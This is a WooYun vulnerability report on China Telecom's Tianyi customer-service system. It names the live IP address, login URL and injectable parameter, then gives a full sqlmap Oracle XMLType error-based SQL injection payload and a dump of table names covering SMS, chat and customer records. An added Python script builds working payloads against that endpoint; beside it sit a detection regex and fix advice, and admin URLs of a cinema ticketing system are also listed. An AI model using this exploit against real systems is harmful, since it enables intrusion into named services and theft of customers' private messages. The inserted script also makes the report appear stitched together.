Vulnerability summary

Defect ID: wooyun-2014-082866

Title: A Tianyi (天翼) vulnerability leads to the compromise of the customer-service system and the movie-ticket system (SMS and chat records are all exposed)

Affected vendor: China Telecom (中国电信)

Author: 爱上平顶山

Submitted: 2014-11-11 14:37

Fix deadline: 2014-12-26 14:38

Public disclosure: 2014-12-26 14:38

Vulnerability type: Content security

Severity: High

Self-assessed Rank: 16

Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-11-11: Details sent to the vendor, awaiting vendor handling
2014-11-14: Vendor confirmed; details disclosed to the vendor only
2014-11-24: Details disclosed to core white hats and domain experts
2014-12-04: Details disclosed to regular white hats
2014-12-14: Details disclosed to intern white hats
2014-12-26: Details disclosed to the public

Brief description:

...

Detailed description:

Tianyi (天翼)
PS: the title is kept vague on purpose, for safety's sake.
1. Injection:
http://116.228.55.189:8887/secs/loginAction.do?action=login
POST injection (the injectable parameter is username), body: projectID=1&password=8&textfield3=1&projectID=0&username=8
OK, straight to sqlmap:
sqlmap identified the following injection points with a total of 620 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: projectID=1&password=88&textfield3=88&projectID=0&username=8' AND 6968=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(110)||CHR(109)||CHR(116)||CHR(58)||(SELECT (CASE WHEN (6968=6968) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(105)||CHR(111)||CHR(110)||CHR(58)||CHR(62))) FROM DUAL) AND 'XtLx'='XtLx
Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
---
available databases [7]:
[*] EXFSYS
[*] MDSYS
[*] SYS
[*] SYSTEM
[*] TYKF
[*] TYKF2
[*] TYYY
current schema (equivalent to database on Oracle): 'TYKF'
Database: TYKF
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| IM_MESSAGE | 9931099 |
| IVR_MIDD_OPER_LOG | 8547544 |
| T_BULLETIN_EVENT | 5740097 |
| IM_MESSAGE_HIST_2012 | 5305063 |
| T_AGENT_OPER_140929LOG | 4570329 |
| T_AGENT_OPER_LOG | 3874106 |
| IVR_AGENT_LOG_BAK | 2818190 |
| T_AGENT_CALL_LOG | 2220560 |
| CALL_WORK_ORDER | 1941486 |
| IVR_AGENT_OPER_LOG | 1832448 |
| IVR_AGENT_LOG | 1797055 |
| IM_SESSION | 1733133 |
| SMS_INFO | 1707157 |
| ORDER_OPERATION_TRACE_BAK | 1605809 |
| SMS_BACKUP_INFO | 1508287 |
| ORDER_OPERATION_TRACE | 1449987 |
| IVR_AGENT_OPER_LOG_BAK | 1286255 |
| CUSTOMERINFO | 1163802 |
| WORK_ORDER_BASE_BAK | 1101773 |
| T_AGENT_SATISFACTIONDEGREE | 1101131 |
| T_PRO_EXECUTE | 1057491 |
| WORK_ORDER_BASE | 1042241 |
| IVR_AGENT_OPER_LOG_20140903BAK | 946820 |
| IM_SESSION_20130523 | 880398 |
| WORK_ORDER_BASE_20130327 | 773390 |
| SMS_SATISFACTION | 752900 |
| IM_USER_ONLINE_LOG | 737112 |
| T_ROBOT_MESSAGE | 600510 |
| TEMP_ORDER_OPERATION_TRACE_BM | 566321 |
| T_ROBOT_SESSION | 428551 |
| WORK_ORDER_BASE_EXPAND | 425355 |
| UP_ORDER_DETAIL | 415991 |
| UNIFY_ORDER_EXPAND | 415987 |
| WORK_ORDER_BASE_JC | 403001 |
| UP_IVR_TRAN_DETAIL | 384118 |
| TEMP_WORK_ORDER_BASE | 383997 |
| T_REPOSITORY_LOG | 367722 |
| TEMP_WORK_ORDER_DEPT_BASE_BM | 364719 |
| IM_IP_INFO | 352969 |
| T_ACCESS_DETAIL | 340713 |
| TEST1 | 306989 |
| T_REPOSITORY_STATISTICS | 306670 |
| T_ORDER_DEAL_ONCE | 255148 |
| SYS_PDCACHE | 217517 |
| T_KHMOB_TEMP | 200000 |
| SYS_PAGEDETAIL | 176500 |
| SYS_PAGEDETAIL_20131011 | 174676 |
| T_AREA_PHONE | 172947 |
| SYS_PAGEDETAIL_20130813 | 170698 |
| SYS_PAGEDETAIL_20130730 | 168466 |
| IM_MESSAGE_TEMP_5553 | 167897 |
| SYS_PAGEDETAIL_20130709 | 167125 |
| SYS_PAGEDETAIL_20130618 | 166749 |
| SYS_PAGEDETAIL_20130523 | 164616 |
| SYS_PAGEDETAIL_20130516 | 163898 |
| SYS_PAGEDETAIL_20130425 | 162306 |
| SYS_PAGEDETAIL_20130402 | 161365 |
| SMS_GET_INFO | 144942 |
| SYS_PAGEDETAIL_20130318 | 136564 |
| SYS_PAGEDETAIL_20130117 | 134909 |
| SYS_PAGEDETAIL_20121019 | 130146 |
| SYS_PAGEDETAIL_2012_10_12 | 130119 |
| SYS_PAGEDETAIL_2012_09_21 | 129503 |
| SYS_PAGEDETAIL_20120914 | 129500 |
| TEMP_WORK_ORDER_BASE_YY | 128436 |
| ORDER_PROCESS | 125270 |
| T_HUNAN_TEL | 124727 |
| T_AGENT_MONITOR | 120033 |
| T_ORDERCONTENT_UPDATE_LOG | 114378 |
| SYS_PAGEDETAIL2012731 | 107813 |
| SMS_BUSY_INFO | 93678 |
| T_AGENT_SATISFACTIONDEGREE_BAK | 89221 |
| T_TEMP_PERSONAL_1217 | 76893 |
| T_SYS_OPER_LOG | 68177 |
| SMS_SEND_INFO_20130619 | 62758 |
| T_DAIL_OUT_OPER_LOG | 56465 |
| ORDER_TRUN | 52467 |
| T_MOBILE_H_CODE | 42226 |
| TEMP_ORDER_OPERATION_TRACE | 41733 |
| CL_TEMP_TIME_OUT | 41336 |
| T_SEARCH_KEY | 37236 |
| IM_COMMENT | 36473 |
| T_TEMP_QC_1307 | 35896 |
| T_BULLETIN_INFO_BAK | 24750 |
| T_TEMP_WG_1214 | 23780 |
| ORDER_AUDIT | 22945 |
| XC_TEMP_TIME_OUT | 20744 |
| T_FN_AGENT_QUERY_LOG | 20638 |
| T_FN_AGENT_CALL_OPER_LOG | 20300 |
| REPORT_SESSION | 20191 |
| T_TEMP_JY | 19626 |
| T_SUSPENSION_LOG | 16405 |
| TEMP_ORDER_OPERATION20131021 | 15928 |
| SYS_UPLOADINFO | 15828 |
| T_TEMP_BY_ZJ_121030 | 14917 |
| T_TEMP_BY_ZJ_20121030 | 14917 |
| IM_SESSION_TEMP_5553 | 14583 |
| UP_IVR_TRAN_DETAIL_BAK | 13805 |
| T_PRO_EXCEPTION | 13568 |
| TEMP_ORDER_OPERATION_TRACE_M | 12492 |
| SUM_T_AGENT_STATE | 11894 |
| T_SEND_MAIL_LOG | 11584 |
| WORK_HELP_QUALITATIVE | 11178 |
| T_TEMP_1222 | 10778 |
| T_TEMP_CP_1214 | 10540 |
| T_SYS_REMINDER | 10500 |
| T_TEMP_20121214 | 9104 |
| T_FN_QCJUHE_BAK_TEST | 8188 |
| SMS_SEND_INFO_20130702 | 7853 |
| SMS_SEND_INFO_BAK | 7003 |
| T_REPOSITORY | 6160 |
| T_REPOSITORY_20131231 | 6160 |
| T_TEMP_GRZH_1221 | 5927 |
| IVR_T_DTMF | 5865 |
| SUM_T_ALLCALL_CDR | 5865 |
| SUM_T_AGENT_CDR | 5365 |
| T_ACCESS_COUNT | 4819 |
| SUM_T_QUEUE_CDR | 4805 |
| T_TEMP_TEL1 | 4434 |
| TEMP_IM_SESSION_1 | 4390 |
| SMS_SEND_INFO_TEMP | 4288 |
| TEMP_IM_SESSION_2 | 4086 |
| SUM_T_REC_INFO | 4025 |
| SYS_CODE | 3097 |
| UPD_PWDRECORD | 3050 |
| T_SYS_USERQUEUE | 2861 |
| IM_USER_ONLINE_LOG_TEMP_5553 | 2739 |
| T_REPOSITORY_20131211 | 2647 |
| TEMP_IM_SESSION | 2416 |
| T_TEMP_TEL2 | 2400 |
| SMS_EXCEPTION_INFO | 2330 |
| T_TEL_CODE | 2319 |
| SYS_CODE_20130418 | 2222 |
| T_TEL_AREA | 2219 |
| T_TEMP_BEIJING_1218 | 2000 |
| T_PROVINCE_TEL4 | 1813 |
| SYS_CODE_20130117 | 1751 |
| T_REPOSITORY_FAVORITE | 1639 |
| T_FN_GRADE_ITEMS | 1529 |
| T_SYS_ROLERIGHT | 1453 |
| T_ORDER_DEAL_ONCE_EXCEPTION | 1451 |
| T_BULLETIN_DEPT | 1365 |
| TEMP_IM_SESSION_3 | 1330 |
| TEMP_ORDER_WORK_BASE_M | 1330 |
| T_FN_PROJECT | 1319 |
| SMS_SEND_INFO_20140424 | 1243 |
| IM_TERMINAL_COMMENT | 1240 |
| T_BULLETIN_BASE | 1233 |
| T_PROVINCE_TEL5 | 1225 |
| SUM_T_AGENT_ATTENDENCE | 1050 |
| T_DEPARTMENT_TYPE | 1001 |
| SYS_CODE2012731 | 898 |
| T_SYS_USERROLE | 770 |
| T_RELATIVE_SYS_USER | 604 |
| T_SYS_USER | 592 |
| T_SYS_USER_20130319 | 580 |
| T_SORT | 575 |
| T_SYS_USER_SHIXIAO | 520 |
| T_TEMP_BY_ZJ_20121107 | 504 |
| T_RED_CUST_LIST_TEMP | 470 |
| IM_COMMON_LANGUAGE | 463 |
| T_SYS_USER_20120719 | 436 |
| T_REPOSITORY_ANNEX | 404 |
| T_FN_QCJUHE_BAK | 359 |
| TREATMENT_GROUP | 343 |
| T_SYS_PERSONAL_SMS_20130228 | 340 |
| T_BUSS_DEFAULT_ORDERCONTENT | 320 |
| T_BUSS_DEFAULT_ORDERCONTENT_X | 310 |
| SYS_TABLEDETAIL | 300 |
| UP_IVR_TRAN_DETAIL_BACKUP_0606 | 285 |
| T_SYS_RIGHT_ACTION | 280 |
| T_SYS_PERSONAL_SMS | 273 |
| T_SYS_RIGHT_ACTION20140808 | 261 |
| T_BULLETIN_LOG | 252 |
| SYS_PAGE | 237 |
| SYS_PAGE_20131011 | 234 |
| SYS_PAGE_20130813 | 232 |
| T_FN_GRADE_IMITEMS | 231 |
| SYS_PAGE_20130730 | 228 |
| SYS_PAGE_20130709 | 223 |
| SYS_PAGE_20130618 | 222 |
| SYS_PAGE_20130523 | 216 |
| SYS_PAGE_20130516 | 214 |
| SYS_PAGE_20130425 | 213 |
| SYS_PAGE_20130402 | 211 |
| IM_SESSION_BAK_20121012 | 207 |
| SYS_PAGE_20130318 | 197 |
| SYS_PAGE_20130117 | 196 |
| T_TEMP_QC_COUNT | 193 |
| T_SYS_TYPE | 190 |
| SYS_PAGE_20121019 | 188 |
| SYS_PAGE_2012_10_12 | 188 |
| SYS_PAGE_20120914 | 187 |
| SYS_PAGE_2012_09_21 | 187 |
| T_SYS_RIGHT | 179 |
| SYS_PAGE_2012731 | 173 |
| T_SYS_RIGHT20140808 | 169 |
| SYS_PAGETOJSP | 167 |
| T_SYS_RIGHT_20120601 | 145 |
| EX_WORK_ORDER | 141 |
| SMS_WM_MOBILE | 140 |
| T_TEMP_ZJ_130708 | 130 |
| T_VERSION_UPDATE_INFO | 126 |
| T_BUSS_DEFAULT_ORDERCONTENT_B | 125 |
| T_FN_TASK_SEAT | 114 |
| T_IVR_USER | 95 |
| UNIFY_ORDER_EXPAND_CONFIG | 86 |
| T_REPORT_HOURS | 84 |
| T_SMS_TEMP | 84 |
| T_IVR_USER_TEMP | 76 |
| T_WORKORDER_TJFS_MX | 73 |
| T_24XS_DZB | 72 |
| TEMP_TIME_OUT | 65 |
| T_SYS_QUEUE | 61 |
| T_NUMBER | 60 |
| T_WORKPAPER | 59 |
| T_TEMP_1227 | 56 |
| UP_BANK_AUTH | 56 |
| T_TEMP_20130319_BY_ZJ | 52 |
| V_BST_TIME_PERIOD_HALF | 48 |
| T_FN_INFO_USER | 46 |
| T_IVR_ROLE_AUTHORITY | 46 |
| CTI_T_DEVICE | 45 |
| T_CFTSGD_BAK2 | 45 |
| T_FN_SHOW_ALARM | 44 |
| T_FN_TEMPLATE | 44 |
| T_DEPT_ORDER | 40 |
| TREATMENT_GROUP_BAK | 40 |
| SYS_TABLESEQS | 37 |
| T_SYS_ROLE | 37 |
| IM_SENSITIVE_WORDS | 36 |
| T_BULLETIN_INFO | 36 |
| SYS_TABLES | 34 |
| T_SYS_USER_20140716 | 34 |
| T_LOCAL_NAME | 32 |
| IVRPAY_RECORD | 31 |
| UP_RESPONSE_CODE | 30 |
| T_TEST | 27 |
| SMS_PHONE | 26 |
| SYS_FUNCTION | 25 |
| T_FN_GRADE | 25 |
| T_FN_TEACHER_TYPE | 25 |
| TMP_TIME | 24 |
| SYS_RF | 22 |
| UPDATE_PWD | 21 |
| T_CFTSGD_BAK | 18 |
| T_FN_GRADE_IMSESSION | 18 |
| T_FN_IMGRADE | 18 |
| IM_COMMON_TYPE | 17 |
| TMP_ORDER_STATUS | 17 |
| T_IVR_MENU | 16 |
| T_REPORT_SMS_SET | 16 |
| CTI_T_USR | 15 |
| CUSTOMERVIRTUALINFO | 15 |
| T_VOICE_QUEUEPARAM | 15 |
| T_BB_GDZT | 14 |
| IM_PARAMETER | 13 |
| ORDER_FEEDBACK | 13 |
| REPORT_T_AGENT_STATE | 13 |
| T_SYS_TEAM | 13 |
| T_REPORT_HOURS_BAK | 12 |
| T_REPOSITORY_CUSTYPE_CONFIG | 12 |
| T_MESSAGE_TEMPLATE | 10 |
| T_SYS_USE_DEL829 | 10 |
| IM_COMMON_LANGUAGE_TEMP_5553 | 9 |
| IVR_SDM_FLOW_CONFIG | 9 |
| T_FN_GRADE_BAK | 9 |
| T_PRESS_KEY | 9 |
| T_SYS_USER_EX | 9 |
| SYS_UPR | 8 |
| T_REPOSITORY_TYPE_DETAILS | 8 |
| T_ACCESS_COUNT_BAK | 7 |
| T_FN_TEMPLATE_QUEUE | 7 |
| T_WP_QUERY_ERROR_OR_NO_EXIST | 7 |
| T_YY_KEY_PARM | 7 |
| ORDER_VISIT | 6 |
| T_CONFIG | 6 |
| T_FN_GRADE_CALLLOG | 6 |
| T_FN_IS_QC | 6 |
| T_FN_TASK | 6 |
| T_STATUS | 6 |
| T_SYS_AREA | 6 |
| T_SYS_UQ_SMS | 6 |
| T_WORKORDER_TJFS | 6 |
| UP_COMM | 6 |
| IVR_AGENT_INTEGRATE_LOG | 5 |
| IVR_COMMONPAY_BINDUSER | 5 |
| SYS_ROLE | 5 |
| SYS_TABLEKEYS | 5 |
| SYS_USER | 5 |
| T_IVR_ROLE | 5 |
| UP_BUSS_FUNDINGSOURCE_CONFIG | 5 |
| REPORT_T_QUEUE_CDR | 4 |
| UP_COMM_20130421 | 4 |
| T_REPOSITORY_TYPE_LOG | 3 |
| T_SMS_MAX | 3 |
| CTI_T_COMPANY_SKILL | 2 |
| T_CFTSGD | 2 |
| T_LEVEL | 2 |
| BANK_AUTH | 1 |
| IVR_BLACK_LIST | 1 |
| SYS_CONFIG | 1 |
| SYS_PROJECT | 1 |
| SYS_VERSION | 1 |
| T_FN_GRADE_CALLLOG_BAK | 1 |
| T_ORDER_NOS | 1 |
| T_YY_REPORT_PARM | 1 |
| TORDERMAXCOUNT | 1 |
| UP_SECRET_KEY | 1 |
| UP_SECRET_KEY_BAK | 1 |
+--------------------------------+---------+
Database: TYKF2
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| ORDER_OPERTION_TRACEE | 3065012 |
| WORK_ORDER_BASE | 2035562 |
| CUSTOMERINFO_INFO | 1596071 |
| WORK_PROCESS_TIME | 1415071 |
| SYS_UPLOADINFO | 21696 |
| SYS_CODE | 2075 |
| T_ADVERTISEMENT_INFO | 3 |
| T_ORDER_NOS | 1 |
+-----------------------+---------+
SMS records and online-consultation chat logs are all exposed.
2. Backend
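The sqlmap output above shows an Oracle error-based injection through XMLType(): the result of an attacker-chosen sub-query is spliced into the XML fragment <:nmt:RESULT:ion:>, XMLType() rejects that as an invalid QName, and Oracle echoes the offending name back in an ORA-19202 / LPX-00110 error, which the login page apparently returned to the client. The script below is an added example, not code from the report or from sqlmap: it instantiates the printed vector (same delimiters and CHR() encoding as the payload above), parses the value back out of a constructed error page, and includes the server-side check an operator would want. The placeholder tokens for space/$/@/# and the sample error page are assumptions made for the example; sqlmap's own tokens are randomised and no response from the target is reproduced here.

```python
"""Error-based Oracle SQL injection via XMLType(), built from the sqlmap vector above.

Added example; nothing here touches a network. The leaked error page is constructed
to look like the Oracle/JDBC message an unhardened JSP app returns.
"""
import re
from urllib.parse import unquote_plus, urlencode

# Delimiters from the payload in the report: CHR(60)||':nmt:' ... ':ion:'||CHR(62)
DELIM_START = ":nmt:"
DELIM_STOP = ":ion:"

# sqlmap REPLACE()s characters that break the QName echo with tokens and swaps them
# back after extraction. Its tokens are randomised; these fixed ones are an assumption.
PLACEHOLDERS = {" ": "__SP__", "$": "__DL__", "@": "__AT__", "#": "__HS__"}


def oracle_chr_concat(s: str) -> str:
    """Encode a literal as CHR(n)||CHR(n)... so the payload carries no quote characters."""
    return "||".join(f"CHR({ord(c)})" for c in s)


def build_payload(query: str, randnum: int = 6968, escape: bool = True) -> str:
    """Instantiate the vector sqlmap printed:
    AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||([QUERY])
                                       ||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
    `query` must yield exactly one string (e.g. SELECT ... FROM DUAL). The leading "8'"
    closes the original username literal; the trailing AND re-balances the quotes."""
    expr = f"({query})"
    if escape:
        for ch, tok in PLACEHOLDERS.items():
            expr = f"REPLACE({expr},'{ch}','{tok}')"
    inner = (f"CHR(60)||{oracle_chr_concat(DELIM_START)}||{expr}"
             f"||{oracle_chr_concat(DELIM_STOP)}||CHR(62)")
    return f"8' AND {randnum}=(SELECT UPPER(XMLType({inner})) FROM DUAL) AND 'XtLx'='XtLx"


def build_post_body(query: str) -> str:
    """Form body for loginAction.do with the payload in `username`; the other fields
    are exactly as in the report (including the duplicated projectID)."""
    fields = [("projectID", "1"), ("password", "88"), ("textfield3", "88"),
              ("projectID", "0"), ("username", build_payload(query))]
    return urlencode(fields)


_ECHO_RE = re.compile(re.escape(DELIM_START) + r"(.*?)" + re.escape(DELIM_STOP), re.S)


def extract_value(response_text: str):
    """Pull the echoed result out of a leaked ORA-19202/LPX-00110 message and undo the
    placeholder substitution. Returns None when the page contains no echo."""
    m = _ECHO_RE.search(response_text)
    if not m:
        return None
    value = m.group(1)
    for ch, tok in PLACEHOLDERS.items():
        value = value.replace(tok, ch)
    return value


def looks_like_xmltype_injection(post_body: str) -> bool:
    """Server- or log-side check: a login form never legitimately submits an XMLType(
    call or a run of CHR(n)|| pieces. Decode first so URL-encoding cannot hide it."""
    body = unquote_plus(post_body)
    return bool(re.search(r"XMLType\s*\(", body, re.I)
                or re.search(r"(?:CHR\(\d+\)\s*\|\|\s*){3,}", body, re.I))


# Constructed sample of the error an unhardened JSP/Struts app leaks; not captured
# from the target.
SAMPLE_ERROR_PAGE = (
    "<h1>HTTP Status 500</h1><pre>java.sql.SQLException: ORA-31011: XML parsing failed\n"
    "ORA-19202: Error occurred in XML processing\n"
    'LPX-00110: Warning: invalid QName ":nmt:TYKF:ion:" (not a Name)\n'
    'Error at line 1\nORA-06512: at "SYS.XMLTYPE", line 310</pre>'
)


if __name__ == "__main__":
    body = build_post_body("SELECT SYS_CONTEXT('USERENV','CURRENT_SCHEMA') FROM DUAL")
    print("POST body:", body)
    print("flagged by check:", looks_like_xmltype_injection(body))
    print("schema read from leaked error:", extract_value(SAMPLE_ERROR_PAGE))
```

Each request leaks one value, which is why sqlmap needed 620 requests for the first run and could then resume from its session file with 0. The real fix is binding `username` as a parameter in the login query (a JDBC PreparedStatement placeholder, given the `.do`/`.jsp` stack); suppressing ORA-* text in responses only closes this error-based channel and leaves the injection reachable through boolean or time-based inference.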
http://116.228.55.189:8887/secs/index.jsp
http://116.228.55.189:8887/blazerV4.3/index.jsp

(screenshot: 0.png)


(screenshot: 1.png)


3. Cinema chain
Jiangsu cinema-chain ticket-booking management system (江苏院线通订票管理系统), address: http://movie.js118114.com/adminax/Default.aspx

(screenshot: 2.png)


OK, I did not go any further.

Proof of vulnerability:

As above

Fix recommendation:

...

Copyright notice: please credit 爱上平顶山@WooYun when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 14

Confirmed: 2014-11-14 17:43

Vendor reply:

Latest status:

None yet